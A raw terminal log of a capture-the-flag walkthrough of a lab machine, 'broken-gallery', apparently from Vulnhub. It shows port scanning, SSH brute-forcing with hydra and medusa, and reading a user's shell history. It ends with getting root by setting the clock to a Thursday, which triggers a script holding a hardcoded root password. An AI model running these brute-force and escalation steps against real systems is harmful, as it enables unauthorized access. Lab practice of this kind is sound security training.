root@Blue3:~# nmap -sC -sV -p- -A -oA NmapFull broken.ctf
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-14 20:03 +07
Nmap scan report for broken.ctf (192.168.1.6)
Host is up (0.017s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 39:5e:bf:8a:49:a3:13:fa:0d:34:b8:db:26:57:79:a7 (RSA)
|   256 20:d7:72:be:30:6a:27:14:e1:e6:c2:16:7a:40:c8:52 (ECDSA)
|_  256 84:a0:9a:59:61:2a:b7:1e:dd:6e:da:3b:91:f9:a0:c6 (ED25519)
80/tcp open  http    Apache httpd 2.4.18
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 55K   2019-08-09 01:20  README.md
| 1.1K  2019-08-09 01:21  gallery.html
| 259K  2019-08-09 01:11  img_5terre.jpg
| 114K  2019-08-09 01:11  img_forest.jpg
| 663K  2019-08-09 01:11  img_lights.jpg
| 8.4K  2019-08-09 01:11  img_mountains.jpg
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Index of /
MAC Address: 00:0C:29:1B:C7:36 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   17.27 ms broken.ctf (192.168.1.6)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.53 seconds

#
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
#

root@Blue3:/media/Linux-Storage/[Github]/eblue3/CTF/Vulnhub/broken-gallery# cat user
gallery
forest
lights
mountains
broken
5terre
root@Blue3:/media/Linux-Storage/[Github]/eblue3/CTF/Vulnhub/broken-gallery# cat pswd
gallery
forest
lights
mountains
broken
5terre

#
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
#

root@Blue3:/media/Linux-Storage/[Github]/eblue3/CTF/Vulnhub/broken-gallery# hydra -L user -P pswd ssh://broken.ctf
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-14 20:38:45
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:6/p:6), ~3 tries per task
[DATA] attacking ssh://broken.ctf:22/
[22][ssh] host: broken.ctf   login: broken   password: broken
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-14 20:38:52

root@Blue3:/media/Linux-Storage/[Github]/eblue3/CTF/Vulnhub/broken-gallery# medusa -U user -P pswd -h broken.ctf -M ssh -t 10
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: forest (2 of 6, 1 complete) Password: mountains (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: gallery (1 of 6, 1 complete) Password: broken (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: gallery (1 of 6, 1 complete) Password: 5terre (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: forest (2 of 6, 1 complete) Password: lights (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: forest (2 of 6, 1 complete) Password: forest (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: gallery (1 of 6, 2 complete) Password: forest (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: gallery (1 of 6, 2 complete) Password: mountains (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: forest (2 of 6, 2 complete) Password: gallery (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: gallery (1 of 6, 2 complete) Password: lights (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: gallery (1 of 6, 2 complete) Password: gallery (6 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: forest (2 of 6, 2 complete) Password: broken (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: forest (2 of 6, 2 complete) Password: 5terre (6 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: broken (5 of 6, 2 complete) Password: forest (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: 5terre (6 of 6, 2 complete) Password: gallery (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: lights (3 of 6, 2 complete) Password: forest (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: 5terre (6 of 6, 2 complete) Password: forest (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: mountains (4 of 6, 2 complete) Password: forest (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: mountains (4 of 6, 2 complete) Password: gallery (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: lights (3 of 6, 2 complete) Password: gallery (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: broken (5 of 6, 2 complete) Password: gallery (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: mountains (4 of 6, 2 complete) Password: lights (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: 5terre (6 of 6, 2 complete) Password: lights (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: broken (5 of 6, 2 complete) Password: lights (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: lights (3 of 6, 2 complete) Password: mountains (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: 5terre (6 of 6, 2 complete) Password: mountains (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: broken (5 of 6, 2 complete) Password: broken (4 of 6 complete)
ACCOUNT FOUND: [ssh] Host: broken.ctf User: broken Password: broken [SUCCESS]
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: mountains (4 of 6, 6 complete) Password: mountains (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: lights (3 of 6, 6 complete) Password: broken (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: mountains (4 of 6, 6 complete) Password: broken (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: lights (3 of 6, 6 complete) Password: lights (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: broken (5 of 6, 6 complete) Password: mountains (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: mountains (4 of 6, 6 complete) Password: 5terre (6 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: 5terre (6 of 6, 6 complete) Password: broken (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: lights (3 of 6, 6 complete) Password: 5terre (6 of 6 complete)
ACCOUNT CHECK: [ssh] Host: broken.ctf (1 of 1, 0 complete) User: 5terre (6 of 6, 6 complete) Password: 5terre (6 of 6 complete)

#
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
#

root@Blue3:~# ssh broken@broken.ctf
The authenticity of host 'broken.ctf (192.168.1.6)' can't be established.
ECDSA key fingerprint is SHA256:6iK6MbJOGAwgxFmxooFsdDj4+MUBHpeR4l54CPQQGhQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'broken.ctf,192.168.1.6' (ECDSA) to the list of known hosts.
broken@broken.ctf's password:
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-21-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

762 packages can be updated.
458 updates are security updates.

New release '18.04.4 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Aug 14 06:15:08 2020 from 192.168.1.3

#
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
#

broken@ubuntu:~$ cat .bash_history
sudo apt-get install apache2
sudo apt-get update
sudo apt-get install apache2
ls
cd ~/Do
cd ~/Desktop/
ls
cp untitled.png untitled.jpeg
vi untitled.jpeg
rm untitled.jpeg
ls
cd ~/Downloads/
ls
vi untitled.j
vi untitled.jpg
nautilus .
cd sudo su
sudo su
cd /var/ww
cd /var/www/html/
ls
rm index.html
sudo rm index.html
sudo vi gallery.html
sudo apt-get install vim
ls
vi gallery.html
sudo cp /tmp/bla.html gallery.html
ls
rm /tmp/bla.html
sudo service apache2  start
sudo vi gallery.html
ls
cat gallery.html
locate img_5terre.jpg
find / -name img_5terre.jpg
sudo vi gallery.html
sudo cp ~/Desktop/img_* .
ls
sudo vi gallery.html
sudo cp img_mountains.jpg broken.jpg
sudo vi broken.jpg
sudo gedit broken.jpg
ls
sudo rm broken.jpg
sudo vi README.md
ls
sudo vi gallery.html
cd ~/Desktop/
ls
rm -rf *
cd ~/Downloads/
ls
rm -rf *
clear
sudo systemctl enable apache2
ping www.google.com
sudo service network-manager stop
sudo service network-manager start
sudo service network-manager status
ifconfig
cp /var/www/html/README.md .
ls
gedit README.md
sudo apt-get install openssh-server
systemctl enable openssh-server
sudo systemctl enable sshd
sudo systemctl enable ssh.service
sudo -l
sudo vi /etc/sudoers
ls
rm -rf README.md
ls
clear
ls
cd /etc/
ls
echo "1234" | passwd --stdin broken
echo "1234" | passwd --stdin user
sudo sh -c 'echo broken:1234 | chpasswd'
sudo su
ls
find . -name *.sh
cd init.d/
ls
sudo vi random.sh
date '+%H * 60 + %M' | bc
date '+%H 60 * %M + p' | dc
if [ "$DAYOFWEEK" == 4 ];  then    echo YES; else    echo NO; fi
sudo vi random.sh
echo $DAYOFWEEK
DAYOFWEEK=$(date +"%u")
echo DAYOFWEEK: $DAYOFWEEK
sudo vi random.sh
ls -la
chmod random.sh 755
chmod 755 random.sh
sudo chmod 755 random.sh
ls -la
sudo ./random.sh
date
sudo date --set="2015-09-30 10:05:59.990"
sudo ./random.sh
sudo date --set="2019-08-09 10:05:59.990"
sudo ./random.sh
sudo date --set="2019-08-10 10:05:59.990"
sudo ./random.sh
sudo vi random.sh
$(date +"%u")
echo $(date +"%u")
sudo date --set="2019-08-11 10:05:59.990"
echo $(date +"%u")
echo $(date +%u)
sudo date --set="2019-08-12 10:05:59.990"
echo $(date +%u)
sudo date --set="2019-08-12 10:05:59.990"
datee
date
date --set="2019-08-12 10:05:59.990"
date
sudo su
sudo timedatectl set-ntp 0
sudo timedatectl set-time "2019-08-09 18:17:16"
date
sudo timedatectl set-time "2019-08-10 18:17:16"
date
sudo ./random.sh
sudo vi random.sh
sudo /etc/sudoers
sudo vi /etc/sudoers
sudo timedatectl set-time "2019-08-07 18:17:16"
echo $(date +%u)
sudo timedatectl set-time "2019-08-08 18:17:16"
echo $(date +%u)
cat random.sh
sudo ./random.sh
sudo vi random.sh
sudo ./random.sh
sudo vi random.sh
sudo ./random.sh
sudo vi random.sh
sudo ./random.sh
sudo vi random.sh
sudo ./random.sh
sudo vi random.sh
sudo timedatectl set-time "2019-08-08 18:17:16"
sudo ./random.sh
sudo vi /etc/sudoers
ls
sudo vi random.sh
sudo ./random.sh
sudo vi random.sh
sudo ./random.sh
sudo vi random.sh
sudo ./random.sh
sudo vi random.sh
sudo ./random.sh 14
sudo vi random.sh
sudo ./random.sh 14
sudo ./random.sh
su - root
cat random.sh
su - root
passwd
cat random.sh
sudo sh -c 'echo broken:broken | chpasswd'
ls
sudo -l
sudo vi /etc/sudoers
cd /var/www/html/
ls
cd ..
ls
su - root
which date
which timedatectl
sudo systemctl disable light.gdm
su - root
sudo -l

timedatectl set-time '2019-08-08 13:45'
date
cd /etc/init.d/
cat password-policy.sh
./password-policy.sh
date
reboot
cat /etc/init.d/password-policy.sh
su - root
history
timedatectl set-time '2018-01-01 00:00'
date
cd /etc/init.d/pas
cd /etc/init.d/
./password-policy.sh
su - root
ls
exit
sudo vi /etc/issue
su - root
exit
history
clear
exit
exit

broken@ubuntu:~$ cat /etc/init.d/password-policy.sh
#!/bin/bash

DAYOFWEEK=$(date +"%u")
echo DAYOFWEEK: $DAYOFWEEK

if [ "$DAYOFWEEK" -eq 4 ]
then
	sudo sh -c 'echo root:TodayIsAgoodDay | chpasswd'
fi



#if [ "$DAYOFWEEK" == 4 ]

#
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
#

broken@ubuntu:/etc/init.d$ timedatectl set-time '2019-08-08 13:45'
==== AUTHENTICATING FOR org.freedesktop.timedate1.set-time ===
Authentication is required to set the system time.
Authenticating as: Broken,,, (broken)
Password:
==== AUTHENTICATION COMPLETE ===
broken@ubuntu:/etc/init.d$ date
Thu Aug  8 13:45:04 PDT 2019
broken@ubuntu:/etc/init.d$ sudo reboot
Connection to broken.ctf closed by remote host.
Connection to broken.ctf closed.

root@Blue3:~# ssh broken@broken.ctf
broken@broken.ctf's password:
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-21-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

762 packages can be updated.
458 updates are security updates.

New release '18.04.4 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Aug 14 06:54:34 2020 from 192.168.1.3
broken@ubuntu:~$ date
Fri Aug 14 06:57:35 PDT 2020
broken@ubuntu:~$ su root
Password: TodayIsAgoodDay
root@ubuntu:/home/broken#
root@ubuntu:/home/broken#
